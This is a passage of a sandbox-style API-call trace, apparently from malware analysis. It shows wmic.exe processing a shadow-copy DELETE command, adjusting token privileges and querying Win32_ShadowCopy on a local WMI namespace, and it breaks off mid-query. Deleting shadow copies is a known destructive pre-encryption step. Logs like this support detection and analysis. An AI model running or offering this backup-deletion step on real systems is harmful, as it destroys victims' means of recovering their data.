varVal2=0x37bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x37bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.708] free (_Block=0x37bef0) [0167.708] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0167.708] malloc (_Size=0x16) returned 0x37bef0 [0167.708] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0167.708] malloc (_Size=0x18) returned 0x37be70 [0167.708] IWbemClassObject:Get (in: This=0x1d109c0, wszName="Locale", lFlags=0, pVal=0x26f680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x37bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.708] free (_Block=0x37be70) [0167.708] lstrlenW (lpString="ms_409") returned 6 [0167.708] malloc (_Size=0xe) returned 0x37be70 [0167.708] lstrlenW (lpString="ms_409") returned 6 [0167.708] malloc (_Size=0x18) returned 0x37be90 [0167.708] IWbemClassObject:Get (in: This=0x1d109c0, wszName="User", lFlags=0, pVal=0x26f680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.708] free (_Block=0x37be90) [0167.708] malloc (_Size=0x18) returned 0x37be90 [0167.708] IWbemClassObject:Get (in: This=0x1d109c0, wszName="Password", lFlags=0, pVal=0x26f680*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.709] free (_Block=0x37be90) [0167.709] malloc (_Size=0x18) returned 0x37be90 [0167.709] IWbemClassObject:Get (in: This=0x1d109c0, wszName="Server", lFlags=0, pVal=0x26f680*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x37bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.709] free (_Block=0x37be90) [0167.709] lstrlenW (lpString=".") returned 1 [0167.709] malloc (_Size=0x4) returned 0x379080 [0167.709] lstrlenW (lpString=".") returned 1 [0167.709] malloc (_Size=0x18) returned 0x37be90 [0167.709] IWbemClassObject:Get (in: This=0x1d109c0, wszName="Authority", lFlags=0, pVal=0x26f680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0x37bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.709] free (_Block=0x37be90) [0167.709] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.709] IUnknown:Release (This=0x1d109c0) returned 0x1 [0167.709] GetCurrentThreadId () returned 0xb18 [0167.709] ??0CHString@@QEAA@XZ () returned 0x26f658 [0167.709] malloc (_Size=0x18) returned 0x37be90 [0167.709] IWbemClassObject:Get (in: This=0x1d104e0, wszName="__RELPATH", lFlags=0, pVal=0x26f680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17a668, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x26f680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0167.710] free (_Block=0x37be90) [0167.710] malloc (_Size=0x18) returned 0x37be90 [0167.710] GetCurrentThreadId () returned 0xb18 [0167.710] ??0CHString@@QEAA@XZ () returned 0x26f4d8 [0167.710] ??0CHString@@QEAA@PEBG@Z () returned 0x26f4f0 [0167.710] ??0CHString@@QEAA@AEBV0@@Z () returned 0x26f480 [0167.710] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0167.710] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x37cc70 [0167.710] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0167.710] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x26f440 [0167.712] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x26f488 [0167.712] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f4f0 [0167.712] ??1CHString@@QEAA@XZ () returned 0x70db3c01 [0167.712] ??1CHString@@QEAA@XZ () returned 0x70db3c01 [0167.712] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x26f448 [0167.712] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f480 [0167.712] ??1CHString@@QEAA@XZ () returned 0x1 [0167.712] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x37cce0 [0167.712] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0167.712] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x26f440 [0167.712] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x26f488 [0167.712] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f4f0 [0167.712] ??1CHString@@QEAA@XZ () returned 0x70db3c01 [0167.712] ??1CHString@@QEAA@XZ () returned 0x70db3c01 [0167.712] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x26f448 [0167.712] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f480 [0167.712] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.713] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef9264820 [0167.713] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.713] malloc (_Size=0x18) returned 0x37beb0 [0167.713] malloc (_Size=0x18) returned 0x37bf10 [0167.713] malloc (_Size=0x18) returned 0x37bf30 [0167.713] malloc (_Size=0x18) returned 0x37bf50 [0167.713] malloc (_Size=0x18) returned 0x37bf70 [0167.713] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0167.713] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0167.713] malloc (_Size=0x18) returned 0x37bf90 [0167.713] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0167.713] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0167.713] malloc (_Size=0x18) returned 0x37bfb0 [0167.713] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0167.713] SysStringLen (param_1="\"") returned 0x1 [0167.713] free (_Block=0x37bf90) [0167.713] free (_Block=0x37bf70) [0167.713] free (_Block=0x37bf50) [0167.714] free (_Block=0x37bf30) [0167.714] free (_Block=0x37bf10) [0167.714] free (_Block=0x37beb0) [0167.714] IWbemServices:GetObject (in: This=0x1d03b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x26f4c8*=0x0, ppCallResult=0x0 | out: ppObject=0x26f4c8*=0x1d10a50, ppCallResult=0x0) returned 0x0 [0167.718] malloc (_Size=0x18) returned 0x37beb0 [0167.718] IWbemClassObject:Get (in: This=0x1d10a50, wszName="Text", lFlags=0, pVal=0x26f500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff482ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x26f500*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x174ad0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0xfdf90, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0167.718] free (_Block=0x37beb0) [0167.718] SafeArrayGetLBound (in: psa=0x174ad0, nDim=0x1, plLbound=0x26f4e0 | out: plLbound=0x26f4e0) returned 0x0 [0167.718] SafeArrayGetUBound (in: psa=0x174ad0, nDim=0x1, plUbound=0x26f4d0 | out: plUbound=0x26f4d0) returned 0x0 [0167.718] SafeArrayGetElement (in: psa=0x174ad0, rgIndices=0x26f4c4, pv=0x26f518 | out: pv=0x26f518) returned 0x0 [0167.718] malloc (_Size=0x18) returned 0x37beb0 [0167.718] malloc (_Size=0x18) returned 0x37bf10 [0167.718] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0167.718] free (_Block=0x37beb0) [0167.718] IUnknown:Release (This=0x1d10a50) returned 0x0 [0167.718] free (_Block=0x37bfb0) [0167.718] ??1CHString@@QEAA@XZ () returned 0x70db3c01 [0167.718] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.718] free (_Block=0x37be90) [0167.719] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.719] lstrlenW (lpString="Shadow copy management.") returned 23 [0167.719] malloc (_Size=0x30) returned 0x3785c0 [0167.719] lstrlenW (lpString="Shadow copy management.") returned 23 [0167.719] free (_Block=0x37bf10) [0167.719] IUnknown:Release (This=0x1d104e0) returned 0x0 [0167.719] free (_Block=0x37bed0) [0167.719] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.719] lstrlenW (lpString="PATH") returned 4 [0167.719] lstrlenW (lpString="DELETE") returned 6 [0167.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0167.719] lstrlenW (lpString="WHERE") returned 5 [0167.719] lstrlenW (lpString="DELETE") returned 6 [0167.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0167.719] lstrlenW (lpString="(") returned 1 [0167.719] lstrlenW (lpString="DELETE") returned 6 [0167.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0167.719] lstrlenW (lpString="/") returned 1 [0167.719] lstrlenW (lpString="DELETE") returned 6 [0167.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0167.719] lstrlenW (lpString="-") returned 1 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0167.720] malloc (_Size=0x18) returned 0x37bed0 [0167.720] lstrlenW (lpString="GET") returned 3 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0167.720] lstrlenW (lpString="LIST") returned 4 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0167.720] lstrlenW (lpString="SET") returned 3 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0167.720] lstrlenW (lpString="CREATE") returned 6 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0167.720] lstrlenW (lpString="CALL") returned 4 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0167.720] lstrlenW (lpString="ASSOC") returned 5 [0167.720] lstrlenW (lpString="DELETE") returned 6 [0167.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0167.721] free (_Block=0x37bed0) [0167.721] lstrlenW (lpString="/") returned 1 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0167.721] lstrlenW (lpString="-") returned 1 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] malloc (_Size=0xe) returned 0x37bed0 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] lstrlenW (lpString="GET") returned 3 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0167.721] lstrlenW (lpString="LIST") returned 4 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0167.721] lstrlenW (lpString="SET") returned 3 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0167.721] lstrlenW (lpString="CREATE") returned 6 [0167.721] lstrlenW (lpString="DELETE") returned 6 [0167.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0167.722] lstrlenW (lpString="CALL") returned 4 [0167.722] lstrlenW (lpString="DELETE") returned 6 [0167.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0167.722] lstrlenW (lpString="ASSOC") returned 5 [0167.722] lstrlenW (lpString="DELETE") returned 6 [0167.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0167.722] lstrlenW (lpString="DELETE") returned 6 [0167.722] lstrlenW (lpString="DELETE") returned 6 [0167.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0167.722] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0167.722] malloc (_Size=0x3e) returned 0x37cc70 [0167.722] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0167.722] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0167.722] malloc (_Size=0x18) returned 0x37bf10 [0167.722] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0167.722] lstrlenW (lpString="FROM") returned 4 [0167.722] lstrlenW (lpString="*") returned 1 [0167.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0167.722] malloc (_Size=0x18) returned 0x37be90 [0167.722] free (_Block=0x37bf10) [0167.723] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720090007c0006 | out: _String=0x0, _Context=0x720090007c0006) returned="from" [0167.723] lstrlenW (lpString="FROM") returned 4 [0167.723] lstrlenW (lpString="from") returned 4 [0167.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0167.723] malloc (_Size=0x18) returned 0x37bf10 [0167.723] free (_Block=0x37be90) [0167.723] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720091007c0006 | out: _String=0x0, _Context=0x720091007c0006) returned="Win32_ShadowCopy" [0167.723] malloc (_Size=0x18) returned 0x37be90 [0167.723] free (_Block=0x37bf10) [0167.723] free (_Block=0x37cc70) [0167.723] free (_Block=0x37be90) [0167.723] lstrlenW (lpString="SET") returned 3 [0167.723] lstrlenW (lpString="DELETE") returned 6 [0167.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0167.723] lstrlenW (lpString="CREATE") returned 6 [0167.723] lstrlenW (lpString="DELETE") returned 6 [0167.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0167.723] free (_Block=0x37bdd0) [0167.723] malloc (_Size=0x8) returned 0x37cc70 [0167.723] lstrlenW (lpString="GET") returned 3 [0167.723] lstrlenW (lpString="DELETE") returned 6 [0167.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0167.724] lstrlenW (lpString="LIST") returned 4 [0167.724] lstrlenW (lpString="DELETE") returned 6 [0167.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0167.724] lstrlenW (lpString="ASSOC") returned 5 [0167.724] lstrlenW (lpString="DELETE") returned 6 [0167.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0167.724] WbemLocator:IUnknown:AddRef (This=0x1cf1390) returned 0x3 [0167.724] free (_Block=0x376700) [0167.724] lstrlenW (lpString="") returned 0 [0167.724] lstrlenW (lpString="XDUWTFONO") returned 9 [0167.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0167.724] lstrlenW (lpString="XDUWTFONO") returned 9 [0167.724] malloc (_Size=0x14) returned 0x37bdd0 [0167.724] lstrlenW (lpString="XDUWTFONO") returned 9 [0167.724] GetCurrentThreadId () returned 0xb18 [0167.724] GetCurrentProcess () returned 0xffffffffffffffff [0167.724] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f8a0 | out: TokenHandle=0x26f8a0*=0x29c) returned 1 [0167.724] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f898 | out: TokenInformation=0x0, ReturnLength=0x26f898) returned 0 [0167.724] malloc (_Size=0x118) returned 0x37cc90 [0167.724] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x37cc90, TokenInformationLength=0x118, ReturnLength=0x26f898 | out: TokenInformation=0x37cc90, ReturnLength=0x26f898) returned 1 [0167.724] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x37cc90*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1373323221, Attributes=0x30ad), (Luid.LowPart=0x0, Luid.HighPart=3630848, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=587203360, Attributes=0x30ba), (Luid.LowPart=0x0, Luid.HighPart=3604824, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0167.725] free (_Block=0x37cc90) [0167.725] CloseHandle (hObject=0x29c) returned 1 [0167.725] lstrlenW (lpString="GET") returned 3 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0167.725] lstrlenW (lpString="LIST") returned 4 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0167.725] lstrlenW (lpString="SET") returned 3 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0167.725] lstrlenW (lpString="CALL") returned 4 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0167.725] lstrlenW (lpString="ASSOC") returned 5 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0167.725] lstrlenW (lpString="CREATE") returned 6 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] lstrlenW (lpString="DELETE") returned 6 [0167.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0167.727] malloc (_Size=0x18) returned 0x37be90 [0167.727] lstrlenA (lpString="") returned 0 [0167.727] malloc (_Size=0x2) returned 0x376700 [0167.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff41314c, cbMultiByte=-1, lpWideCharStr=0x376700, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.727] free (_Block=0x376700) [0167.727] malloc (_Size=0x18) returned 0x37bf10 [0167.727] lstrlenA (lpString="") returned 0 [0167.727] malloc (_Size=0x2) returned 0x376700 [0167.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff41314c, cbMultiByte=-1, lpWideCharStr=0x376700, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.728] free (_Block=0x376700) [0167.728] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0167.728] malloc (_Size=0x3e) returned 0x37cc90 [0167.728] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0167.728] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0167.728] malloc (_Size=0x18) returned 0x37bfb0 [0167.728] free (_Block=0x37bf10) [0167.728] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720095006c0005 | out: _String=0x0, _Context=0x720095006c0005) returned="*" [0167.728] lstrlenW (lpString="FROM") returned 4 [0167.728] lstrlenW (lpString="*") returned 1 [0167.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0167.728] malloc (_Size=0x18) returned 0x37bf10 [0167.728] free (_Block=0x37bfb0) [0167.728] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720096006c0005 | out: _String=0x0, _Context=0x720096006c0005) returned="from" [0167.728] lstrlenW (lpString="FROM") returned 4 [0167.728] lstrlenW (lpString="from") returned 4 [0167.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0167.728] malloc (_Size=0x18) returned 0x37bfb0 [0167.728] free (_Block=0x37bf10) [0167.729] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720097006c0005 | out: _String=0x0, _Context=0x720097006c0005) returned="Win32_ShadowCopy" [0167.729] malloc (_Size=0x18) returned 0x37bf10 [0167.729] free (_Block=0x37bfb0) [0167.729] free (_Block=0x37cc90) [0167.729] malloc (_Size=0x18) returned 0x37bfb0 [0167.729] malloc (_Size=0x18) returned 0x37beb0 [0167.729] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0167.729] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0167.729] free (_Block=0x37be90) [0167.729] free (_Block=0x37bfb0) [0167.729] ??0CHString@@QEAA@XZ () returned 0x26f810 [0167.729] GetCurrentThreadId () returned 0xb18 [0167.729] malloc (_Size=0x18) returned 0x37bfb0 [0167.729] malloc (_Size=0x18) returned 0x37be90 [0167.729] malloc (_Size=0x18) returned 0x37bf30 [0167.729] malloc (_Size=0x18) returned 0x37bf50 [0167.729] malloc (_Size=0x18) returned 0x37bf70 [0167.729] SysStringLen (param_1="\\\\") returned 0x2 [0167.730] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0167.730] malloc (_Size=0x18) returned 0x37bf90 [0167.730] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0167.730] SysStringLen (param_1="\\") returned 0x1 [0167.730] malloc (_Size=0x18) returned 0x37ccc0 [0167.730] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0167.730] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0167.730] free (_Block=0x37bf90) [0167.730] free (_Block=0x37bf70) [0167.730] free (_Block=0x37bf50) [0167.730] free (_Block=0x37bf30) [0167.730] free (_Block=0x37be90) [0167.730] free (_Block=0x37bfb0) [0167.731] malloc (_Size=0x18) returned 0x37bfb0 [0167.731] malloc (_Size=0x18) returned 0x37be90 [0167.731] malloc (_Size=0x18) returned 0x37bf30 [0167.731] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4829d0 | out: ppNamespace=0xff4829d0*=0x1d03c18) returned 0x0 [0167.739] free (_Block=0x37bf30) [0167.739] free (_Block=0x37be90) [0167.739] free (_Block=0x37bfb0) [0167.739] CoSetProxyBlanket (pProxy=0x1d03c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0167.739] free (_Block=0x37ccc0) [0167.739] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.739] ??0CHString@@QEAA@XZ () returned 0x26f760 [0167.739] GetCurrentThreadId () returned 0xb18 [0167.739] malloc (_Size=0x18) returned 0x37bfb0 [0167.739] lstrlenA (lpString="") returned 0 [0167.739] malloc (_Size=0x2) returned 0x376700 [0167.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff41314c, cbMultiByte=-1, lpWideCharStr=0x376700, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.739] free (_Block=0x376700) [0167.739] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0167.739] SysStringLen (param_1="") returned 0x0 [0167.739] free (_Block=0x37bfb0) [0167.739] malloc (_Size=0x18) returned 0x37bfb0 [0167.740] IWbemServices:ExecQuery (in: 